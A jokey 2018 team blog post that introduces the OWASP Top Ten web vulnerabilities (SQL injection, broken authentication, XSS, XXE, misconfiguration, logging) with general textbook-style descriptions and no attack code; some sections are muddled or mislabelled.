Rapunzel Stars in: Red Riding Hood

Donald Bachmann
Aug 7, 2018 · 8 min read

Red Team Attack Vector Blog

Red Team Report

With the ever evolving threat market, Rapunzel thought it might be beneficial to team up with a cyber Red Riding Hood approach to security. So follow Rapunzel while she cracks open a can of whoop-derrière for the bug bounty player’s club, with a shout out to big timers who might be savvy in areas other than Web Application pen-testing Vectors. With Rapunzel’s state of the art Application Security software bundle, created in part(actually in whole) by the Savage Beasts over at Offensive Security, the creators of Kali Linux, anyone should be able to switch gears into beast mode. Before we unleash the beast go ahead and put your red hood on and follow along as Rapunzel smashes through on her forest trail of the OWASP top Ten.

Let the Countdown(count up actually) Begin!

The first on our list of beat down dogmas was brought to us by none other than one of Rapunzel’s finest, an X-Marine who’ll be quick to turn his head if you say Jeff. Jeff, who originally wanted to make an extra buck burning WhiteHat midnight oil this summer, hold on for a second, did you say midnight oil?? Yup, I sure did, but the buck didn’t stop there! Tell’em what they got coming in at OWASP’s first round draft pick, number ONE:

SQL Injection [which] refers to an injection attack wherein an attacker can execute malicious SQL statements that control a web application’s database server. Since an SQL Injection vulnerability could possibly affect any website or web application that makes use of an SQL-based database, the vulnerability is one of the oldest, most prevalent and most dangerous of web application vulnerabilities.

Coming in at our number TWO spot is Broken Authentication:

Brought to you by none other than your’s truly, the big D-man Donnie Bachmann, the one who put the satin in your swag! Let me put it like this, surfing the web might be a carefree activity for the majority of internet users. After all how many people really get hacked, or carelessly leave tabs open from prior bank account access at the library. Users approaching their web security mildly, browsing away with their fingers crossed might not be making the best subconscious choice for themselves. Broken Authentication can be quite an unexpected data breach. Some of the types of broken authentication related attacks are able to essentially circumvent even solid authentication mechanisms which can be undermined by flawed credential management functions, including password change, forgot my password, remember my password, account update, and other related functions.

Trailing behind is our buddy with OWASP’s number Three spot, Sensitive Data Exposure:

With a knife and a fresh baked bread of your choice, Manny, the youngest member of the Rapunzel team, can slap together a sandwich so good it’ll make you wanna slap your BlackHat Momma for not hacking into subway’s recipe mainframe system.

Although Manny isn’t to crazy about some of the self sacrificing endeavors encountered by us Elite Ethical Haxors, he still set aside some time to break down the get down on Sensitive Data Exposure. Many web applications and APIs do not properly protect sensitive data, such as financial,
healthcare, and PII.

Attackers may steal or modify such weakly protected data to conduct credit
card fraud, identity theft, or other crimes.

Sensitive data may be compromised without extra
protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser. Nice copy and paste job!

As we are coming around the corner with our next contender at OWASP’s number Four give it up for none other than External Entities(XXE):

Rapunzel’s wouldn’t be complete without our “Mr. Robot” loving counterpart Dilara Marasli, a student who first came to the U_S_of_A.py for a STEM competition. Soon after she didn’t hesitate to join the winning team here in the states with a little Cyber like nail you to the firewall kind of approach to pwning the cyber threat market. Tell us a little about number four Miss Robot!

Well Donnie, Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into websites. XSS attacks occur when a user least expects it, preferably when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. On the brighter side of death by XML External Entity vulnerability (abbreviated XXE) we have ourselves an attack against an application parsing XML input from an unreliable source. It’s usually caused by a misconfigured XML parser, so double check your code before a dude with a BlackHat crosses your Web-Apps making path!

I know you probably need to grab your motor oil like cup of Joe, and make your way over to that smart car that might get hacked save for our future efforts. Furthermore I would like to invite you to take a gander at some of our documents on the OWASP-Top-Ten which include walk through adventures with RAPUNZEL, no “punzel” intended! This ain’t no fairytale, Hollywood, shake’n bake idea we are cook’n up so stay tuned as Rapunzel proceeds to explain some/all of the remainder of vulnerabilities.

What is it?:

  • Broken access control is fairly common due to lack of automated detection, and lack of effective functional testing by applications
  • Basically, it means that many websites have admin and regular accounts. Admin has access to the admin and regular accounts and the regular only has access to the regular account.

What is it?:

  • Improper server or web application configuration leading to various flaws.
  • Unpatched bugs
  • Access to default admin accounts
  • Unprotected files/directories
  • Anything that leads to private data
  • Many web servers come as an Apache server that has many features
  • Apache servers can come with more than 200 vulnerabilities
  • If a web server does not need a feature, then it should be either turned off or deleted because it can be an extra vulnerability
  • The extra features could be; Default accounts, unused pages, or unprotected file uploads
  • One important Misconfiguration is File Uploads as mentioned above
  • Some files containing executable code are not allowed (.php, .exe, .asp, .js, etc). But if implemented incorrectly or not present at all, then an attacker can execute code on the server.

WHAT IS IT?

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.

What could a determined hacker do when exploiting a XSS vulnerability?

XSS allows arbitrary execution of JavaScript code, so the damage that can be done by an attacker depends on the sensitivity of the data being handled by your site. Some of the things hackers have done by exploiting XSS:

  • Spreading worms on social media sites. Facebook, Twitter and YouTube have all been successfully attacked in this way.
  • Session hijacking. Malicious JavaScript may be able to send the session ID to a remote site under the hacker’s control, allowing the hacker to impersonate that user by hijacking a session in progress.

How Does it work?:

  • When the client is sending clear text data to the web server the attacker intercepts the data without either side(client/web server) knowing

How secure is it?:

  • Over the last few years, this has been one of the top vulnerabilities that attackers have been taking advantage of. The security all depends of the encryption of the sensitive data.

Who does it impact?:

  • Everyone using the internet. It may be very broad but to put it into specifics; the people who use websites to access and give personal documentation or data

Insufficient Logging and Monitoring

Source: https://securityonline.info/owasp-top-10-2017/

What is Insufficient Logging and Monitoring?

This is not actually a vulnerability, but a good practice in identifying an attack. This type of practice is a proactive measure so hacking can be identified and prevented. For example you have a username and password on your website and someone is trying to extract information by logging in 10,000 most common usernames and 10,000 most common passwords for those usernames. A failure in log and monitoring will result in time for the hacker to get get it right and cause damage to your website. A successful log and monitor practice will disabile the attackers stealth, prevent him from logging in, may drive the attacker away or catch him. Actions that can be taken will be beyond the scope of this write-up. There is a certain balance in logging information. Too little information and you may not be able to identify if it is an attack, suspicious activity or not. Too much information will also make it hard to identify an attack, suspicious activity or make it harder what type of attack they are trying to perform.

How is it preventable?

  1. When someone is trying to access user accounts the failed logins should be not be stored locally. If they get into the login files they can edit the logs to prevent detection. Allow forensics time to respond to an attack is vital.
  2. When an attack is identified a planned response may not be available or in place. This would cause network admins to be placed in a defensive position. Even if an attack is identified they may still be able to cause damage if a response process is not in place.
  3. Have your website and network professionally penetration tested and receive a detailed report on the strengths and weaknesses in your network. Then fix them. Constantly update your software to patch exploits.
  4. Create a good schedule for monitoring the log files. Be thorough enough to find suspicious activity. Complacency of the cyber security team is the key to this type of attack and logging without monitoring is useless

I hope you enjoyed all these tidbits about how we, the red team, would infiltrate your not so secure network. It might seem like we barely put together this blog strategy, that’s because we barely did. Please bear with us as we develop and grow with the industry that so preciously needs more people like us. thank you and stay tuned till next week.

Thanks to Nicholas Handy.

Donald Bachmann

Written by